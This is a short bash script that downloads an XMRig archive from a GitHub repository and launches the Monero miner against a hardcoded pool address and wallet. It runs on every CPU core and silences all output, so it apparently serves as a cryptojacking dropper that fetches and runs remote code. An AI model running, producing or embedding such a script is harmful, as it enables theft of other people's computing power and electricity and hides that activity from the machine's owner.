#!/bin/bash
A=157.230.255.104:443
B=ZEPHs76XECAcLHnic3AGyf1toptvfeWxv38x5hHL9MfEdz5LG5RzM3xggSjwdS3BhzA3g645UpTGReA6FjC18TBbZRFVycrH4uv
C=JIUSS
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --url $A --user $B --pass $C --donate-level 1 -a rx/0 -t $(nproc --all) >/dev/null 2>&1
